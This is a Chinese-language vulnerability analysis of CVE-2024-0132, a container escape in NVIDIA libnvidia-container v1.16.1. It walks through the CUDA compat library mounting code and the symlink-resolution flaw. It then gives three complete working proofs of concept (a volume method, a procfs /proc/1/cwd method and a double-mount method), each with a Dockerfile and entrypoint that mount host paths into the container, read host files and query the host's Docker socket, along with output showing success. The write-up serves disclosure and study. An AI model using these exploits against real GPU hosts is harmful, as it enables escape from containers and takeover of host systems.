static intfind_library_paths(struct error *err, struct nvc_container *cnt){ char path[PATH_MAX]; glob_t gl; int rv = -1; char **ptr; if (!(cnt->flags & OPT_COMPUTE_LIBS)) return (0); if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0) return (-1); if (path_append(err, path, "compat/lib*.so.*") < 0) return (-1); if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0) goto fail; if (gl.gl_pathc > 0) { cnt->nlibs = gl.gl_pathc; cnt->libs = ptr = array_new(err, gl.gl_pathc); if (cnt->libs == NULL) goto fail; for (size_t i = 0; i < gl.gl_pathc; ++i) { if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0) goto fail; if (!str_array_match(path, (constchar * const *)cnt->libs, (size_t)(ptr - cnt->libs))) { log_infof("selecting %s%s", cnt->cfg.rootfs, path); if ((*ptr++ = xstrdup(err, path)) == NULL) goto fail; } } array_pack(cnt->libs, &cnt->nlibs); } rv = 0; fail: globfree(&gl); return (rv);}
filter_libraries
函数主要过滤出满足以下条件的库,才执行挂载:
1. 文件名中要有 .so.
- 与主机cuda库版本号不匹配
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static voidfilter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size){ char *lib, *maj; /* * XXX Filter out any library that matches the major version of RM to prevent us from * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers). */ for (size_t i = 0; i < *size; ++i) { lib = basename(paths[i]); if ((maj = strstr(lib, ".so.")) != NULL) { maj += strlen(".so."); if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789"))) continue; } paths[i] = NULL; } array_pack(paths, size);}
3. 漏洞分析
3.1 漏洞点分析
首先让我们预设漏洞效果: 可以从主机挂载任意文件到容器。要达到这样的效果,条件是挂载的源地址要可控。
根据章节“2. 调用链分析”,cuda前向兼容特性提供了这样一个机会:从容器挂载文件到容器。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
intnvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info){ ... /* Container library mounts */ if (cnt->libs != NULL && cnt->nlibs > 0) { size_t nlibs = cnt->nlibs; char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs); if (libs == NULL) goto fail; filter_libraries(info, libs, &nlibs); if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) { free(libs); goto fail; } ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); free(libs); } ...}
令libs路径为指向主机目录的软链接,如果后续没有防护措施,则可能达成漏洞效果。
挂载时没有什么防护,只有一个要满足match_binary_flags()
的要求。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100
static char **mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size){ char src[PATH_MAX]; char dst[PATH_MAX]; mode_t mode; char *src_end, *dst_end, *file; char **mnt, **ptr; if (path_new(err, src, root) < 0) return (NULL); if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0) return (NULL); if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0) return (NULL); src_end = src + strlen(src); dst_end = dst + strlen(dst); mnt = ptr = array_new(err, size + 1); /* NULL terminated. */ if (mnt == NULL) return (NULL); for (size_t i = 0; i < size; ++i) { file = basename(paths[i]); if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags)) continue; if (path_append(err, src, paths[i]) < 0) goto fail; if (path_append(err, dst, file) < 0) goto fail; if (file_mode(err, src, &mode) < 0) goto fail; if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0) goto fail; log_infof("mounting %s at %s", src, dst); if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0) goto fail; if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0) goto fail; if ((*ptr++ = xstrdup(err, dst)) == NULL) goto fail; *src_end = '\0'; *dst_end = '\0'; } return (mnt); fail: for (size_t i = 0; i < size; ++i) unmount(mnt[i]); array_free(mnt, size); return (NULL);}
那么,剩下来的事情就很简单了:
1. 找到哪些文件是”libs” => find_library_paths()
,filter_libraries()
-
修改目标文件为指向主机文件的软链接,使得将来挂载时将主机文件挂载到容器
-
符合 match_binary_flags()
或match_library_flags()
要求 -
最终执行到挂载命令
3.2 数据格式分析
分析 find_library_paths()
,filter_libraries()
,match_binary_flags()
, match_library_flags()
的限制。
3.2.1 find_library_paths()
TLDR;
1. 利用路径为容器的 /usr/local/cuda/compat/lib..so.
路径
-
解析软链接后添加到 cnt->libs
-
注意:此时没有加入容器的mount namespace
find_library_paths()
函数默认在容器rootfs /usr/local/cuda/compat/lib..so.
查找 libs。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L73
static intfind_library_paths(struct error *err, struct nvc_container *cnt){ char path[PATH_MAX]; glob_t gl; int rv = -1; char **ptr; if (!(cnt->flags & OPT_COMPUTE_LIBS)) return (0); if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0) return (-1); if (path_append(err, path, "compat/lib*.so.*") < 0) return (-1); if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0) goto fail; if (gl.gl_pathc > 0) { ... } rv = 0; fail: globfree(&gl); return (rv);}
对目标路径执行一次解析软链接,如果目标是软链接要能解析成功,将解析后的路径加入到 cnt->libs。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L85
static intfind_library_paths(struct error *err, struct nvc_container *cnt){ ... if (gl.gl_pathc > 0) { cnt->nlibs = gl.gl_pathc; cnt->libs = ptr = array_new(err, gl.gl_pathc); if (cnt->libs == NULL) goto fail; for (size_t i = 0; i < gl.gl_pathc; ++i) { if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0) goto fail; if (!str_array_match(path, (constchar * const *)cnt->libs, (size_t)(ptr - cnt->libs))) { log_infof("selecting %s%s", cnt->cfg.rootfs, path); if ((*ptr++ = xstrdup(err, path)) == NULL) goto fail; } } array_pack(cnt->libs, &cnt->nlibs); } ...}
do_path_resolve 会根据 ‘/’ 来分段, 并解析每一段路径中的软链接,对于不存在的路径,则保持原样。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/utils.c#L802
static intdo_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path){ int fd = -1; int rv = -1; char realpath[PATH_MAX]; char dbuf[2][PATH_MAX]; char *link = dbuf[0]; char *ptr = dbuf[1]; char *file, *p; unsignedint noents = 0; unsignedint nlinks = 0; ssize_t n; *ptr = '\0'; *realpath = '\0'; assert(*root == '/'); if ((fd = open_next(err, -1, root)) < 0) goto fail; if (path_append(err, ptr, path) < 0) goto fail; while ((file = strsep(&ptr, "/")) != NULL) { if (*file == '\0' || str_equal(file, ".")) continue; elseif (str_equal(file, "..")) { /* * Remove the last component from the resolved path. If we are not below * non-existent components, restore the previous file descriptor as well. */ if ((p = strrchr(realpath, '/')) == NULL) { error_setx(err, "path error: %s resolves outside of %s", path, root); goto fail; } *p = '\0'; if (noents > 0) --noents; else { if ((fd = open_next(err, fd, "..")) < 0) goto fail; } } else { if (noents > 0) goto missing_ent; n = readlinkat(fd, file, link, PATH_MAX); if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) { /* * Component is a symlink, append the rest of the path to it and * proceed with the resulting buffer. If it is absolute, also clear * the resolved path and reset our file descriptor to root. */ link[n] = '\0'; if (*link == '/') { ++link; *realpath = '\0'; if ((fd = open_next(err, fd, root)) < 0) goto fail; } if (ptr != NULL) { if (path_append(err, link, ptr) < 0) goto fail; } ptr = link; link = dbuf[++nlinks % 2]; } else { if (n >= PATH_MAX) errno = ENAMETOOLONG; elseif (nlinks >= MAXSYMLINKS) errno = ELOOP; switch (errno) { missing_ent: case ENOENT: /* Component doesn't exist */ ++noents; if (path_append(err, realpath, file) < 0) goto fail; break; case EINVAL: /* Not a symlink, proceed normally */ if ((fd = open_next(err, fd, file)) < 0) goto fail; if (path_append(err, realpath, file) < 0) goto fail; break; default: error_set(err, "path error: %s/%s", root, path); goto fail; } } } } if (!full) { if (path_new(err, buf, realpath) < 0) goto fail; } else { if (path_join(err, buf, root, realpath) < 0) goto fail; } rv = 0; fail: xclose(fd); return (rv);}intpath_resolve(struct error *err, char *buf, const char *root, const char *path){ return (do_path_resolve(err, false, buf, root, path));}
需要注意的是:
1. find_library_paths
函数执行时,还没有加入到容器的mount namespace
- 未来具体挂载时,nvc_driver_mount
函数执行时会加入容器的mount namespace
因此,可利用这个特点来触发程序执行的差异。即,某个路径在 find_library_paths 中解析软链接时表现为文件不存在,无法解析软链接; 而在 nvc_driver_mount 中解析软链接时,可以成功解析软链接。
3.2.2 filter_libraries()
filter_libraries()
从每个 lib 名称中提取出版本号,要求lib版本号与 nvrm_version
不同。因为如果相同,就没有必要再挂载一次了。
只需要随意编造一个版本号,即可绕过该限制。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static voidfilter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size){ char *lib, *maj; /* * XXX Filter out any library that matches the major version of RM to prevent us from * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers). */ for (size_t i = 0; i < *size; ++i) { lib = basename(paths[i]); if ((maj = strstr(lib, ".so.")) != NULL) { maj += strlen(".so."); if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789"))) continue; } paths[i] = NULL; } array_pack(paths, size);}
3.2.3 match_binary_flags(), match_library_flags()
TLDR;
1. 设置环境变量 NVIDIA_DRIVER_CAPABILITIES=all
以跳过关于 flags & OPT_XX
的判断。
- bin/library文件的前缀在预设范围内。
要求bin/library文件的前缀在预设范围内。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L755
boolmatch_binary_flags(const char *bin, int32_t flags){ if ((flags & OPT_UTILITY_BINS) && str_array_match_prefix(bin, utility_bins, nitems(utility_bins))) return (true); if ((flags & OPT_COMPUTE_BINS) && str_array_match_prefix(bin, compute_bins, nitems(compute_bins))) return (true); return (false);}boolmatch_library_flags(const char *lib, int32_t flags){ if (str_array_match_prefix(lib, dxcore_libs, nitems(dxcore_libs))) return (true); if ((flags & OPT_UTILITY_LIBS) && str_array_match_prefix(lib, utility_libs, nitems(utility_libs))) return (true); if ((flags & OPT_COMPUTE_LIBS) && str_array_match_prefix(lib, compute_libs, nitems(compute_libs))) return (true); if ((flags & OPT_VIDEO_LIBS) && str_array_match_prefix(lib, video_libs, nitems(video_libs))) return (true); if ((flags & OPT_GRAPHICS_LIBS) && (str_array_match_prefix(lib, graphics_libs, nitems(graphics_libs)) || str_array_match_prefix(lib, graphics_libs_glvnd, nitems(graphics_libs_glvnd)) || str_array_match_prefix(lib, graphics_libs_compat, nitems(graphics_libs_compat)))) return (true); if ((flags & OPT_NGX_LIBS) && str_array_match_prefix(lib, ngx_libs, nitems(ngx_libs))) return (true); return (false);}
其中,flags
可以通过环境变量NVIDIA_DRIVER_CAPABILITIES
来控制, 设置为NVIDIA_DRIVER_CAPABILITIES=all
开启全部 driver capability。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/options.h#L82-L87
static const struct option container_opts[] = { ... {"utility", OPT_UTILITY_BINS|OPT_UTILITY_LIBS}, {"compute", OPT_COMPUTE_BINS|OPT_COMPUTE_LIBS}, {"video", OPT_VIDEO_LIBS|OPT_COMPUTE_LIBS}, {"graphics", OPT_GRAPHICS_LIBS}, {"display", OPT_DISPLAY|OPT_GRAPHICS_LIBS}, {"ngx", OPT_NGX_LIBS}, ...};
预设的前缀包括:
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L60
static constchar * const utility_bins[] = { "nvidia-smi", /* System management interface */ "nvidia-debugdump", /* GPU coredump utility */ "nvidia-persistenced", /* Persistence mode utility */ "nv-fabricmanager", /* NVSwitch fabric manager utility */ //"nvidia-modprobe", /* Kernel module loader */ //"nvidia-settings", /* X server settings */ //"nvidia-xconfig", /* X xorg.conf editor */};staticconstchar * const compute_bins[] = { "nvidia-cuda-mps-control", /* Multi process service CLI */ "nvidia-cuda-mps-server", /* Multi process service server */};staticconstchar * const utility_libs[] = { "libnvidia-ml.so", /* Management library */ "libnvidia-cfg.so", /* GPU configuration */ "libnvidia-nscq.so", /* Topology info for NVSwitches and GPUs */};staticconstchar * const compute_libs[] = { "libcuda.so", /* CUDA driver library */ "libcudadebugger.so", /* CUDA Debugger Library */ "libnvidia-opencl.so", /* NVIDIA OpenCL ICD */ "libnvidia-gpucomp.so", /* Shared Compiler Library */ "libnvidia-ptxjitcompiler.so", /* PTX-SASS JIT compiler (used by libcuda) */ "libnvidia-fatbinaryloader.so", /* fatbin loader (used by libcuda) */ "libnvidia-allocator.so", /* NVIDIA allocator runtime library */ "libnvidia-compiler.so", /* NVVM-PTX compiler for OpenCL (used by libnvidia-opencl) */ "libnvidia-pkcs11.so", /* Encrypt/Decrypt library */ "libnvidia-pkcs11-openssl3.so", /* Encrypt/Decrypt library (OpenSSL 3 support) */ "libnvidia-nvvm.so", /* The NVVM Compiler library */};staticconstchar * const video_libs[] = { "libvdpau_nvidia.so", /* NVIDIA VDPAU ICD */ "libnvidia-encode.so", /* Video encoder */ "libnvidia-opticalflow.so", /* NVIDIA Opticalflow library */ "libnvcuvid.so", /* Video decoder */};staticconstchar * const graphics_libs[] = { //"libnvidia-egl-wayland.so", /* EGL wayland platform extension (used by libEGL_nvidia) */ "libnvidia-eglcore.so", /* EGL core (used by libGLES*[_nvidia] and libEGL_nvidia) */ "libnvidia-glcore.so", /* OpenGL core (used by libGL or libGLX_nvidia) */ "libnvidia-tls.so", /* Thread local storage (used by libGL or libGLX_nvidia) */ "libnvidia-glsi.so", /* OpenGL system interaction (used by libEGL_nvidia) */ "libnvidia-fbc.so", /* Framebuffer capture */ "libnvidia-ifr.so", /* OpenGL framebuffer capture */ "libnvidia-rtcore.so", /* Optix */ "libnvoptix.so", /* Optix */};staticconstchar * const graphics_libs_glvnd[] = { //"libGLX.so", /* GLX ICD loader */ //"libOpenGL.so", /* OpenGL ICD loader */ //"libGLdispatch.so", /* OpenGL dispatch (used by libOpenGL, libEGL and libGLES*) */ "libGLX_nvidia.so", /* OpenGL/GLX ICD */ "libEGL_nvidia.so", /* EGL ICD */ "libGLESv2_nvidia.so", /* OpenGL ES v2 ICD */ "libGLESv1_CM_nvidia.so", /* OpenGL ES v1 common profile ICD */ "libnvidia-glvkspirv.so", /* SPIR-V Lib for Vulkan */ "libnvidia-cbl.so", /* VK_NV_ray_tracing */};staticconstchar * const graphics_libs_compat[] = { "libGL.so", /* OpenGL/GLX legacy _or_ compatibility wrapper (GLVND) */ "libEGL.so", /* EGL legacy _or_ ICD loader (GLVND) */ "libGLESv1_CM.so", /* OpenGL ES v1 common profile legacy _or_ ICD loader (GLVND) */ "libGLESv2.so", /* OpenGL ES v2 legacy _or_ ICD loader (GLVND) */};staticconstchar * const ngx_libs[] = { "libnvidia-ngx.so", /* NGX library */};staticconstchar * const dxcore_libs[] = { "libdxcore.so", /* Core library for dxcore support */};
3.3 漏洞利用
总结“3.1 漏洞点分析”、“3.2 数据格式分析”节,漏洞利用需要达成的条件为:
1. 在容器的 /usr/local/cuda/compat/lib..so.
路径设置软链接, 注意 find_library_paths()
函数中会进行软链接解析再返回路径
-
文件名满足要求:(1)包含.so.
; (2)版本号与nvrm_version不同 -
mount前,校验文件名符合特定前缀
欲达成逃逸类危害,需要在mount时,控制挂载源路径为主机路径。则漏洞利用步骤为:
1. 在容器的 /usr/local/cuda/compat/lib..so.
路径设置软链接
-
加入容器的mount namespace
-
文件名满足要求:(1)包含.so.
; (2)版本号与nvrm_version不同 -
mount前,校验文件名符合特定前缀
-
mount时,挂载源路径为主机路径,mount本身会解析软链接,实现将主机路径挂载到容器。注意挂载以只读模式挂载
为满足步骤5,软链接应指向主机路径,但无法满足步骤2,3的要求。因此需要2层软链接, 例如:
/usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 -> /HOST
1. /usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999
满足步骤1,2,3,4要求
- /?/libnvidia-ml.so.999 -> /HOST
满足步骤5要求
但实际 find_library_paths()
函数调用 do_path_resolve()
函数进行软链接解析时,可能导致软链接被直接解析为 /X
而导致无法满足步骤2,3,4要求。
如何同时满足是主要待解决的难题,即如何实现:
1. do_path_resolve()
解析软链接为 /?/libnvidia-ml.so.999
- mount 解析软链接为 /HOST
如何达成?有以下两种思路:
1. 构造不存在的路径,使得第一次解析中断: do_path_resolve()
遇到不存在的路径时会原样输出路径
- 条件竞争:两个容器共享目录,通过条件竞争动态修改软链接目标路径
条件竞争是比较容易达成目标的,但会导致需要一个严格的漏洞利用条件。继续确认第1个思路的可行性。
注意到步骤一执行时未加入容器的mount namespace,则有三种方式来构造不存在的路径
1. (ssst0n3) 挂载卷: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999 -> /
-
(ssst0n3) procfs: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/?/libnvidia-ml.so.999 -> /
-
(ym) 分别设置目录和文件来构造两次挂载: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /
, /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112
对于前两种方式(挂载卷、procfs):
1. 在进入容器 mount namespace 之前,容器 rootfs 下的 /volume
和/proc
会是空目录,满足步骤1,2,3,4要求。
- 进入容器 mount namespace 之后,/volume
和/proc
挂载点可见,其下将存在软链接。
对于第三种方式(构造2次挂载):
1. find_library_paths首先查找完所有的待处理路径,再统一执行挂载,因此可通过构造两次挂载,使第一次挂载改变第二次挂载的目录环境。
-
find_library_paths所查找的路径包含目录。
-
在执行挂载动作前,/usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/
目录不存在,满足步骤1,2,3,4要求。 -
在挂载目录 /usr/local/cuda/compat/libnvidia-cfg.so.111
后,/usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112
是指向主机的软链接。
3.3.1 volume 方法
-
构造软链接: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999
-
容器启动时,通过-v
参数挂载卷进来,其中卷里包含一个软链接 /volume/libnvidia-ml.so.999 -> /
完整 poc 如下:
root@wanglei-gpu:~/poc# lsDockerfile entrypoint.sh volumeroot@wanglei-gpu:~/poc# cat Dockerfile FROM ubuntuRUN apt update && apt install curl -yWORKDIR /usr/local/cuda/compatRUN ln -s /volume/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /hostRUN ln -s /volume/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-runCOPY entrypoint.sh /# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0ENV NVIDIA_DRIVER_CAPABILITIES=allCMD /entrypoint.shroot@wanglei-gpu:~/poc# cat entrypoint.sh #!/bin/bashset -x#echo '[+] mounted host files'#echo '[+] reading /etc/hostname'cat /host/etc/hostname#echo 'mounted docker.sock; reading containers'curl --unix-socket /host-run/docker.sock http://localhost/containers/jsonroot@wanglei-gpu:~/poc# ls -lah volume/total 8.0Kdrwxr-xr-x 2 root root 4.0K Dec 12 22:09 .drwxr-xr-x 3 root root 4.0K Dec 12 22:08 ..lrwxrwxrwx 1 root root 4 Dec 12 22:09 libnvidia-cfg.so.1 -> /runlrwxrwxrwx 1 root root 1 Dec 12 22:02 libnvidia-ml.so.1 -> /
root@wanglei-gpu:~/poc# docker build -t ssst0n3/poc-cve-2024-0132:volume .root@wanglei-gpu:~/poc# docker run -ti --runtime=nvidia --gpus=all -v $(pwd)/volume:/volume ssst0n3/poc-cve-2024-0132:volume+ cat /host/etc/hostnamewanglei-gpu+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json[{"Id":"ad772936a25e694562d7f9f5378b8489981910442be2cd2953e5ca7a0aa022bd","Names":["/great_mayer"],"Image":"ssst0n3/poc-cve-2024-0132:volume","ImageID":"sha256:f416b61ba4d3c81d461f9be06faa60e754577f39fe5ca783dc68ae8ec8dc6b5d","Command":"/bin/sh -c /entrypoint.sh","Created":1734012735,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"3fc07f3e7a9ba4a6ead11fddaf306af818d6994e86cab1783a4134a1b1adb846","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/root/poc/volume","Destination":"/volume","Mode":"","RW":true,"Propagation":"rprivate"}]}]
实现了漏洞的利用,但是要求使用挂载卷,下面一节将通过procfs来巧妙地实现无需挂载卷利用。
3.3.2 procfs 方法
容器rootfs下/proc/1
是runc init
进程的相关文件,/proc/1/cwd
指向容器的rootfs。
1. 构造软链接: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/1/cwd/libnvidia-ml.so.999
- 构造软链接: /libnvidia-ml.so.999 -> /
完整PoC如下, 达到了比较理想的利用效果:
root@wanglei-gpu:~/poc-procfs# cat Dockerfile FROM ubuntuRUN apt update && apt install curl -yWORKDIR /usr/local/cuda/compatRUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \ ln -s / /usr/lib/libnvidia-ml.so.1 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /hostRUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \ ln -s /run /usr/lib64/libnvidia-cfg.so.1 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-runCOPY entrypoint.sh /# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0ENV NVIDIA_DRIVER_CAPABILITIES=allCMD /entrypoint.shroot@wanglei-gpu:~/poc-procfs# cat entrypoint.sh #!/bin/bashset -x#echo '[+] mounted host files'#echo '[+] reading /etc/hostname'cat /host/etc/hostname#echo 'mounted docker.sock; reading containers'curl --unix-socket /host-run/docker.sock http://localhost/containers/jsonroot@wanglei-gpu:~/poc-procfs# lsDockerfile entrypoint.shroot@wanglei-gpu:~/poc-procfs# docker build -t ssst0n3/poc-cve-2024-0132:proc .DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/Sending build context to Docker daemon 3.584kBStep 1/8 : FROM ubuntu ---> b1d9df8ab815Step 2/8 : RUN apt update && apt install curl -y ---> Using cache ---> 22cff36a341cStep 3/8 : WORKDIR /usr/local/cuda/compat ---> Using cache ---> d13208243e8fStep 4/8 : RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && ln -s / /usr/lib/libnvidia-ml.so.1 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host ---> Using cache ---> 6371e6b56cabStep 5/8 : RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && ln -s /run /usr/lib64/libnvidia-cfg.so.1 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run ---> Running in 6d3f1fb775b2Removing intermediate container 6d3f1fb775b2 ---> 24cfef3630d3Step 6/8 : COPY entrypoint.sh / ---> 473de3b01d8fStep 7/8 : ENV NVIDIA_DRIVER_CAPABILITIES=all ---> Running in 215739d1c861Removing intermediate container 215739d1c861 ---> ab62217ce62bStep 8/8 : CMD /entrypoint.sh ---> Running in 358b01f5a7e5Removing intermediate container 358b01f5a7e5 ---> e8b3b6adb292Successfully built e8b3b6adb292Successfully tagged ssst0n3/poc-cve-2024-0132:proc
root@wanglei-gpu:~# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132:proc+ cat /host/etc/hostnamewanglei-gpu+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json[{"Id":"a84e9812921f2a49541982607b0488f3b9bc8bd04ae074c6b65f5546761a1367","Names":["/keen_wu"],"Image":"ssst0n3/poc-cve-2024-0132:proc","ImageID":"sha256:e8b3b6adb292f3732662e09d721b6ae20d52b4e8d3ae54037917d3fcae6d1418","Command":"/bin/sh -c /entrypoint.sh","Created":1734014316,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"bf50a193cce8ba008eb132b957d511300b626e85b0d8e3150d4264a6da75e19d","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
3.3.3 两次挂载方法
-
构造软链接: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /
-
构造软链接: /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112
完整PoC如下, 利用效果也很理想:
root@wanglei-gpu:~/poc-2mounts# cat Dockerfile FROM ubuntuRUN apt update && apt install curl -yWORKDIR /usr/local/cuda/compatRUN mkdir libnvidia-cfg.so.111 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 && \ ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 && \ ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-runCMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/jsonroot@wanglei-gpu:~/poc-2mounts# docker build -t ssst0n3/poc-cve-2024-0132-ym .DEPRECATED: The legacy builder is deprecated and will be removed in a future release. Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/Sending build context to Docker daemon 3.072kBStep 1/5 : FROM ubuntu ---> b1d9df8ab815Step 2/5 : RUN apt update && apt install curl -y ---> Using cache ---> 77fb95a6fc52Step 3/5 : WORKDIR /usr/local/cuda/compat ---> Using cache ---> 311a3960cc5fStep 4/5 : RUN mkdir libnvidia-cfg.so.111 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 && ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run ---> Using cache ---> dcc8fbd93574Step 5/5 : CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json ---> Using cache ---> fc14d064757dSuccessfully built fc14d064757dSuccessfully tagged ssst0n3/poc-cve-2024-0132-ym:latestroot@wanglei-gpu:~/poc-2mounts# docker run -ti --rm --runtime nvidia --gpus=all ssst0n3/poc-cve-2024-0132-ym[{"Id":"d45013b4c5293030f9c01929e81b69d1af0d676a44d230710c8a97baef394758","Names":["/friendly_perlman"],"Image":"ssst0n3/poc-cve-2024-0132-ym","ImageID":"sha256:fc14d064757d9b17bf6454e06fe63af49f17fbd95391158908625142def35c86","Command":"/bin/sh -c 'sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json'","Created":1736862952,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"c4573489d87e5162cf69495fcb6a4bb879c152012853d98d8ab202b0bf13e755","EndpointID":"a73ef57a093f3c18a4d0df8c5bc29f4b3d104e4653ce45a63216b81dc010dec1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
4. 为什么 /proc/self/cwd 无法利用
/proc/self
是一个符号链接,指向 /proc/<当前进程的PID>。
仅进入 Mount 命名空间,导致文件系统视图(包括 /proc)切换到容器的视图,但进程仍然在宿主机的 PID 命名空间中,因此无法正常显示 /proc/self
目录。
可以将问题简化为使用 nsenter -m 进入容器的mount namespace, 将发现无法访问 /proc/self
。
